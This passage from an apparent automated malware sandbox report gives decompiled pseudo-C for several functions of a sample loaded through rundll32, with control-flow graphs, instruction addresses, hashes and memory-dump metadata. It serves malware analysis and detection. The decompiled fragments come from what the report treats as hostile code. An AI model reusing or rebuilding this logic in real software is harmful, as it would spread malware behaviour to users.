                                                                                                                                                                                                                                    • Opcode ID: 6ed4306fa152e8d6b1574dd890a9a572cc295771f9aeff849bc01777de912ab5
                                                                                                                                                                                                                                    • Instruction ID: 0fd2fd2a9c3fe9e00878c4bb461d9352341763de12b3c7c996ad100e42f7b950
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ed4306fa152e8d6b1574dd890a9a572cc295771f9aeff849bc01777de912ab5
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 533181B5901108BFEB11DBA0DC84EAA7BBDEF44706F158055B601A7161D775FE04EF50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C37B5D, Relevance: .1, Instructions: 82COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 500 4c37b5d-4c37b91 502 4c37b93-4c37b96 500->502 503 4c37c0b-4c37c11 500->503 504 4c37bb3-4c37bcd 502->504 505 4c37b98-4c37bb0 call 4c3908b 502->505 509 4c37bf8-4c37bfa 504->509 510 4c37bcf-4c37bd9 504->510 505->504 511 4c37c02-4c37c07 509->511 512 4c37bfc-4c37bfe 509->512 513 4c37be2-4c37be9 510->513 511->503 512->511 514 4c37bf2-4c37bf4 513->514 515 4c37beb-4c37bf0 513->515 514->509 515->509
                                                                                                                                                                                                                                    C-Code - Quality: 64%
                                                                                                                                                                                                                                    			E04C37B5D(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				void* _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t22;
				void* _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				void* _t32;
				intOrPtr* _t33;
				intOrPtr _t36;
				intOrPtr* _t39;
				void* _t46;

				_t22 =  *0x4c3d27c; // 0x202a5a8
				_t2 = _t22 + 0x4c3e0dc; // 0x6c68684
				_t3 = _t22 + 0x4c3e0cc; // 0x4590f811
				_t39 = 0;
				_v12 = 0;
				_t24 =  *0x4c3d15c(_t3, 0, 1, _t2,  &_v16); // executed
				_t46 = _t24;
				if(_t46 >= 0) {
					if(_a8 != 0) {
						_t36 =  *0x4c3d27c; // 0x202a5a8
						_t8 = _t36 + 0x4c3e3b8; // 0x5f005f
						E04C3908B(_t8, _a8,  &_v12);
						_t39 = _v12;
					}
					_t26 = _v16;
					_t46 =  *((intOrPtr*)( *_t26 + 0xc))(_t26, _a4, 0, 0, 0, 0, 0, _t39,  &_v8);
					if(_t46 >= 0) {
						_t32 =  *0x4c3d158(_v8, 0xa, 0, 0, 3, 3, 0, 0); // executed
						_t46 = _t32;
						_t33 = _v8;
						if(_t46 < 0) {
							 *((intOrPtr*)( *_t33 + 8))(_t33);
						} else {
							 *_a12 = _t33;
						}
					}
					if(_t39 != 0) {
						 *((intOrPtr*)( *_t39 + 8))(_t39);
					}
					_t28 = _v16;
					 *((intOrPtr*)( *_t28 + 8))(_t28);
				}
				return _t46;
			}















                                                                                                                                                                                                                                    0x04c37b6a
                                                                                                                                                                                                                                    0x04c37b6f
                                                                                                                                                                                                                                    0x04c37b7b
                                                                                                                                                                                                                                    0x04c37b81
                                                                                                                                                                                                                                    0x04c37b84
                                                                                                                                                                                                                                    0x04c37b87
                                                                                                                                                                                                                                    0x04c37b8d
                                                                                                                                                                                                                                    0x04c37b91
                                                                                                                                                                                                                                    0x04c37b96
                                                                                                                                                                                                                                    0x04c37b9c
                                                                                                                                                                                                                                    0x04c37ba4
                                                                                                                                                                                                                                    0x04c37bab
                                                                                                                                                                                                                                    0x04c37bb0
                                                                                                                                                                                                                                    0x04c37bb0
                                                                                                                                                                                                                                    0x04c37bb3
                                                                                                                                                                                                                                    0x04c37bc9
                                                                                                                                                                                                                                    0x04c37bcd
                                                                                                                                                                                                                                    0x04c37bdc
                                                                                                                                                                                                                                    0x04c37be2
                                                                                                                                                                                                                                    0x04c37be6
                                                                                                                                                                                                                                    0x04c37be9
                                                                                                                                                                                                                                    0x04c37bf5
                                                                                                                                                                                                                                    0x04c37beb
                                                                                                                                                                                                                                    0x04c37bee
                                                                                                                                                                                                                                    0x04c37bee
                                                                                                                                                                                                                                    0x04c37be9
                                                                                                                                                                                                                                    0x04c37bfa
                                                                                                                                                                                                                                    0x04c37bff
                                                                                                                                                                                                                                    0x04c37bff
                                                                                                                                                                                                                                    0x04c37c02
                                                                                                                                                                                                                                    0x04c37c08
                                                                                                                                                                                                                                    0x04c37c08
                                                                                                                                                                                                                                    0x04c37c11

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: f47665f5d3291e51a3c268ea40042e4f13f7accf4a53bcb33b487deed12d668a
                                                                                                                                                                                                                                    • Instruction ID: 039e3d144167b16f4d1adb15a8c8c88be501d5aa3f5cea15f9965be73b7b92f7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f47665f5d3291e51a3c268ea40042e4f13f7accf4a53bcb33b487deed12d668a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A3217FB5601218BFCB10DFA4C888D9EBBBEEF89B56F008495F506DB240C631EE01DB60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C383B7, Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 516 4c383b7-4c38406 518 4c38479-4c3847e 516->518 519 4c38408-4c38419 516->519 521 4c38470 519->521 522 4c3841b-4c3843b call 4c32049 519->522 521->518 526 4c38466 522->526 527 4c3843d-4c38447 522->527 529 4c3846f 526->529 528 4c3844c-4c3844e 527->528 530 4c38460-4c38461 call 4c39039 528->530 531 4c38450-4c3845f call 4c35544 528->531 529->521 530->526 531->530
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: bcba8e027b34aaddf07a613a0a167c7601d4ab87baf305f19d51e6e22195539e
                                                                                                                                                                                                                                    • Instruction ID: 4517b76a695fd50d4085254006fdb467cd267a65fa266406600c53f6ad95f3b0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bcba8e027b34aaddf07a613a0a167c7601d4ab87baf305f19d51e6e22195539e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9521E6B6900228BBDF11AF95CC85ADEBFBEEF08751F104066FA04B6110D7759A44AFA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C343DF, Relevance: .1, Instructions: 79COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 535 4c343df-4c343ef call 4c32049 538 4c34495-4c34498 535->538 539 4c343f5-4c3440c 535->539 540 4c3449d-4c3449f 538->540 541 4c34413-4c34418 539->541 542 4c3448a-4c34493 call 4c39039 541->542 543 4c3441a-4c3443d 541->543 542->540 547 4c3443f-4c34458 543->547 548 4c3447e 543->548 551 4c34472-4c3447c 547->551 552 4c3445a-4c34470 547->552 550 4c34482-4c34488 548->550 550->542 553 4c3449a 550->553 551->548 552->550 553->540
                                                                                                                                                                                                                                    C-Code - Quality: 53%
                                                                                                                                                                                                                                    			E04C343DF(void* __ebx, void* __ecx, void* __edi, signed int _a4) {
				signed int _v8;
				void* _t19;
				signed int _t21;
				intOrPtr _t22;
				intOrPtr* _t26;
				signed int _t27;
				intOrPtr* _t28;
				signed int _t29;
				intOrPtr* _t30;
				intOrPtr* _t32;
				intOrPtr* _t35;
				intOrPtr* _t40;
				intOrPtr _t43;
				intOrPtr _t45;
				intOrPtr* _t49;
				intOrPtr* _t51;

				_t51 = E04C32049(_t19, 0xc);
				if(_t51 == 0) {
					_t21 = 8;
				} else {
					_t22 =  *0x4c3d27c; // 0x202a5a8
					_t1 = _t22 + 0x4c3e058; // 0x6c68600
					_t2 = _t22 + 0x4c3e028; // 0x2df01
					_t24 =  *0x4c3d15c(_t2, 0, 4, _t1, _t51); // executed
					_v8 = _t24;
					if(_t24 < 0) {
						L8:
						E04C39039(_t24, _t51);
						_t21 = _v8;
					} else {
						_t43 =  *0x4c3d27c; // 0x202a5a8
						_t26 =  *_t51;
						_t4 = _t51 + 4; // 0x4
						_t35 = _t4;
						_t5 = _t43 + 0x4c3e048; // 0xd30c1661
						_t27 =  *((intOrPtr*)( *_t26))(_t26, _t5, _t35, __edi, __ebx);
						_v8 = _t27;
						_t28 =  *_t51;
						_t40 =  *_t28;
						if(_t27 < 0) {
							L6:
							_t24 =  *((intOrPtr*)(_t40 + 8))(_t28);
						} else {
							_t45 =  *0x4c3d27c; // 0x202a5a8
							_t7 = _t51 + 8; // 0x8
							_t49 = _t7;
							_t8 = _t45 + 0x4c3e068; // 0x2df05
							_t29 =  *_t40(_t28, _t8, _t49);
							_v8 = _t29;
							if(_t29 < 0) {
								_t30 =  *_t35;
								 *((intOrPtr*)( *_t30 + 8))(_t30);
								_t28 =  *_t51;
								_t40 =  *_t28;
								goto L6;
							} else {
								_t32 =  *_t49;
								 *((intOrPtr*)( *_t32 + 0xa4))(_t32, 0);
								_t24 = _a4;
								_a4 = _a4 & 0x00000000;
								 *_a4 = _t51;
							}
						}
						if(_v8 >= 0) {
							_t21 = _a4;
						} else {
							goto L8;
						}
					}
				}
				return _t21;
			}



















                                                                                                                                                                                                                                    0x04c343eb
                                                                                                                                                                                                                                    0x04c343ef
                                                                                                                                                                                                                                    0x04c34497
                                                                                                                                                                                                                                    0x04c343f5
                                                                                                                                                                                                                                    0x04c343f5
                                                                                                                                                                                                                                    0x04c343fb
                                                                                                                                                                                                                                    0x04c34406
                                                                                                                                                                                                                                    0x04c3440d
                                                                                                                                                                                                                                    0x04c34415
                                                                                                                                                                                                                                    0x04c34418
                                                                                                                                                                                                                                    0x04c3448a
                                                                                                                                                                                                                                    0x04c3448b
                                                                                                                                                                                                                                    0x04c34490
                                                                                                                                                                                                                                    0x04c3441a
                                                                                                                                                                                                                                    0x04c3441a
                                                                                                                                                                                                                                    0x04c34420
                                                                                                                                                                                                                                    0x04c34426
                                                                                                                                                                                                                                    0x04c34426
                                                                                                                                                                                                                                    0x04c3442a
                                                                                                                                                                                                                                    0x04c34432
                                                                                                                                                                                                                                    0x04c34434
                                                                                                                                                                                                                                    0x04c34439
                                                                                                                                                                                                                                    0x04c3443b
                                                                                                                                                                                                                                    0x04c3443d
                                                                                                                                                                                                                                    0x04c3447e
                                                                                                                                                                                                                                    0x04c3447f
                                                                                                                                                                                                                                    0x04c3443f
                                                                                                                                                                                                                                    0x04c3443f
                                                                                                                                                                                                                                    0x04c34445
                                                                                                                                                                                                                                    0x04c34445
                                                                                                                                                                                                                                    0x04c34449
                                                                                                                                                                                                                                    0x04c34451
                                                                                                                                                                                                                                    0x04c34455
                                                                                                                                                                                                                                    0x04c34458
                                                                                                                                                                                                                                    0x04c34472
                                                                                                                                                                                                                                    0x04c34477
                                                                                                                                                                                                                                    0x04c3447a
                                                                                                                                                                                                                                    0x04c3447c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c3445a
                                                                                                                                                                                                                                    0x04c3445a
                                                                                                                                                                                                                                    0x04c34461
                                                                                                                                                                                                                                    0x04c34467
                                                                                                                                                                                                                                    0x04c3446a
                                                                                                                                                                                                                                    0x04c3446e
                                                                                                                                                                                                                                    0x04c3446e
                                                                                                                                                                                                                                    0x04c34458
                                                                                                                                                                                                                                    0x04c34488
                                                                                                                                                                                                                                    0x04c3449a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c34488
                                                                                                                                                                                                                                    0x04c34418
                                                                                                                                                                                                                                    0x04c3449f

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 49c56717f76b4dade9e95c8f54e43a95601c6e095e0c1a0625ceeae78de3688a
                                                                                                                                                                                                                                    • Instruction ID: bcab6922f367cf011ac5f1615e8955477d178c04546e460222ad7b97cfabaad5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 49c56717f76b4dade9e95c8f54e43a95601c6e095e0c1a0625ceeae78de3688a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 652148B5600204EFE714CFA4C888F9A77B9EF8970AF108568F646CB250D775EE05DBA4
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C31A70, Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 556 4c31a70-4c31a84 557 4c31a89-4c31a8e 556->557 558 4c31b25-4c31b2c 557->558 559 4c31a94-4c31a97 557->559 560 4c31ab1-4c31ab4 559->560 561 4c31a99-4c31aae 559->561 560->558 562 4c31ab6-4c31abb 560->562 561->560 563 4c31b18-4c31b23 562->563 564 4c31abd-4c31acf 562->564 563->558 568 4c31ad1-4c31ade 564->568 569 4c31b0f-4c31b14 564->569 568->569 571 4c31ae0-4c31aee call 4c32049 568->571 569->563 574 4c31af0-4c31afd call 4c35544 571->574 575 4c31aff 571->575 577 4c31b06 574->577 575->577 577->569
                                                                                                                                                                                                                                    C-Code - Quality: 35%
                                                                                                                                                                                                                                    			E04C31A70(intOrPtr* __eax, intOrPtr* _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				char _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				intOrPtr _t37;
				intOrPtr _t44;
				void* _t46;

				_push( &_v12);
				_push(__eax);
				_t37 = 0;
				_t44 = 0; // executed
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					__imp__(0xc8);
					_push( &_v12);
					_push(__eax);
					_v8 =  *((intOrPtr*)( *__eax + 0x24))();
				}
				if(_v8 >= _t37) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							__imp__(_v16);
							_t44 = _t31;
							if(_t44 != 0) {
								_t44 = _t44 + 1;
								_t46 = _t44 + _t44;
								_t37 = E04C32049(_t31, _t46);
								if(_t37 == 0) {
									_v8 = 0x8007000e;
								} else {
									_push(_t46);
									_push(_v16);
									_push(_t37);
									L04C35544();
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t37;
					 *_a8 = _t44 + _t44;
				}
				goto L13;
			}













                                                                                                                                                                                                                                    0x04c31a80
                                                                                                                                                                                                                                    0x04c31a81
                                                                                                                                                                                                                                    0x04c31a82
                                                                                                                                                                                                                                    0x04c31a84
                                                                                                                                                                                                                                    0x04c31a86
                                                                                                                                                                                                                                    0x04c31a8b
                                                                                                                                                                                                                                    0x04c31a8e
                                                                                                                                                                                                                                    0x04c31b25
                                                                                                                                                                                                                                    0x04c31b2c
                                                                                                                                                                                                                                    0x04c31b2c
                                                                                                                                                                                                                                    0x04c31a97
                                                                                                                                                                                                                                    0x04c31a9e
                                                                                                                                                                                                                                    0x04c31aa9
                                                                                                                                                                                                                                    0x04c31aaa
                                                                                                                                                                                                                                    0x04c31aae
                                                                                                                                                                                                                                    0x04c31aae
                                                                                                                                                                                                                                    0x04c31ab4
                                                                                                                                                                                                                                    0x04c31ab6
                                                                                                                                                                                                                                    0x04c31abb
                                                                                                                                                                                                                                    0x04c31ac4
                                                                                                                                                                                                                                    0x04c31acc
                                                                                                                                                                                                                                    0x04c31acf
                                                                                                                                                                                                                                    0x04c31ad4
                                                                                                                                                                                                                                    0x04c31ada
                                                                                                                                                                                                                                    0x04c31ade
                                                                                                                                                                                                                                    0x04c31ae0
                                                                                                                                                                                                                                    0x04c31ae1
                                                                                                                                                                                                                                    0x04c31aea
                                                                                                                                                                                                                                    0x04c31aee
                                                                                                                                                                                                                                    0x04c31aff
                                                                                                                                                                                                                                    0x04c31af0
                                                                                                                                                                                                                                    0x04c31af0
                                                                                                                                                                                                                                    0x04c31af1
                                                                                                                                                                                                                                    0x04c31af4
                                                                                                                                                                                                                                    0x04c31af5
                                                                                                                                                                                                                                    0x04c31afa
                                                                                                                                                                                                                                    0x04c31b09
                                                                                                                                                                                                                                    0x04c31b09
                                                                                                                                                                                                                                    0x04c31ade
                                                                                                                                                                                                                                    0x04c31b0f
                                                                                                                                                                                                                                    0x04c31b15
                                                                                                                                                                                                                                    0x04c31b15
                                                                                                                                                                                                                                    0x04c31b1e
                                                                                                                                                                                                                                    0x04c31b23
                                                                                                                                                                                                                                    0x04c31b23
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 09791f304d7596d1070e2cad5a2244039275363d6dd2a96b50b4efcd88540ca5
                                                                                                                                                                                                                                    • Instruction ID: 35a204ed0099e852b3923d2ae74c019859523b6a621f755931003f073a559f18
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 09791f304d7596d1070e2cad5a2244039275363d6dd2a96b50b4efcd88540ca5
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D9215675A00209FFDB10DFA4D884DDEBBB5FF49316B1441A9E905E7210EB30EA45DB50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C38504, Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                                                                                    			E04C38504(void* __eax, void* __ecx, char _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				char _v8;
				void* __edi;
				intOrPtr _t18;
				void* _t23;
				void* _t28;
				void* _t35;
				char _t38;
				intOrPtr _t40;

				_push(__ecx);
				_push(__ecx);
				_t40 =  *0x4c3d340; // 0x6c68d39
				_push(0x800);
				_push(0);
				_push( *0x4c3d238);
				if( *0x4c3d24c >= 5) {
					__imp__();
					if(__eax == 0) {
						L6:
						_t28 = 8;
						L7:
						if(_t28 != 0) {
							L10:
							 *0x4c3d24c =  *0x4c3d24c + 1;
							L11:
							return _t28;
						}
						_t42 = _a4;
						_t38 = _v8;
						 *_a16 = _a4;
						 *_a20 = E04C32496(_a4, _t38); // executed
						_t18 = E04C3A66E(_t35, _t38, _t42); // executed
						if(_t18 != 0) {
							 *_a8 = _t38;
							 *_a12 = _t18;
							if( *0x4c3d24c < 5) {
								 *0x4c3d24c =  *0x4c3d24c & 0x00000000;
							}
							goto L11;
						}
						_t28 = 0xbf;
						E04C3A1B0();
						__imp__( *0x4c3d238, 0, _t38); // executed
						goto L10;
					}
					_t23 = E04C3A279(_a4, __ecx, _t35, _t40,  &_v8,  &_a4, __eax);
					L5:
					_t28 = _t23;
					goto L7;
				}
				__imp__();
				if(__eax == 0) {
					goto L6;
				}
				_t23 = E04C38B94(_a4, __ecx, _t35, _t40,  &_v8,  &_a4, __eax); // executed
				goto L5;
			}











                                                                                                                                                                                                                                    0x04c38507
                                                                                                                                                                                                                                    0x04c38508
                                                                                                                                                                                                                                    0x04c38512
                                                                                                                                                                                                                                    0x04c38519
                                                                                                                                                                                                                                    0x04c3851e
                                                                                                                                                                                                                                    0x04c38520
                                                                                                                                                                                                                                    0x04c38526
                                                                                                                                                                                                                                    0x04c38546
                                                                                                                                                                                                                                    0x04c3854e
                                                                                                                                                                                                                                    0x04c38566
                                                                                                                                                                                                                                    0x04c38568
                                                                                                                                                                                                                                    0x04c38569
                                                                                                                                                                                                                                    0x04c3856b
                                                                                                                                                                                                                                    0x04c385a9
                                                                                                                                                                                                                                    0x04c385a9
                                                                                                                                                                                                                                    0x04c385af
                                                                                                                                                                                                                                    0x04c385b5
                                                                                                                                                                                                                                    0x04c385b5
                                                                                                                                                                                                                                    0x04c3856d
                                                                                                                                                                                                                                    0x04c38573
                                                                                                                                                                                                                                    0x04c38576
                                                                                                                                                                                                                                    0x04c38585
                                                                                                                                                                                                                                    0x04c38587
                                                                                                                                                                                                                                    0x04c3858e
                                                                                                                                                                                                                                    0x04c385c2
                                                                                                                                                                                                                                    0x04c385c7
                                                                                                                                                                                                                                    0x04c385c9
                                                                                                                                                                                                                                    0x04c385cb
                                                                                                                                                                                                                                    0x04c385cb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c385c9
                                                                                                                                                                                                                                    0x04c38590
                                                                                                                                                                                                                                    0x04c38595
                                                                                                                                                                                                                                    0x04c385a3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c385a3
                                                                                                                                                                                                                                    0x04c3855d
                                                                                                                                                                                                                                    0x04c38562
                                                                                                                                                                                                                                    0x04c38562
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c38562
                                                                                                                                                                                                                                    0x04c38528
                                                                                                                                                                                                                                    0x04c38530
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c3853f
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 98539cf550a2c2924d36ae7902fa147a08c309b3f3a664c41612ddb2bfb31a62
                                                                                                                                                                                                                                    • Instruction ID: ffee09e7f4a58df857354f70d66e50feeb4d057e275347596905163f82816070
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 98539cf550a2c2924d36ae7902fa147a08c309b3f3a664c41612ddb2bfb31a62
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A21107A201204EBEB11EF55D884FAA37FDEB48756F004016F902E7150D779EE459BB1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C3924F, Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e43a17e9097d47ef36fb9b26de0ed49ea0b9078825df613cffc98eb58fa58706
                                                                                                                                                                                                                                    • Instruction ID: 93c28dda68366068ec79e272e05c3fbec5b5e43ae90e1721f6e08f43207b066e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e43a17e9097d47ef36fb9b26de0ed49ea0b9078825df613cffc98eb58fa58706
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6212CB5900259FFEB019F94DD84EEEBB7AEB44705F000065E511A6150C7759E05EB50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C31B2F, Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp Download File
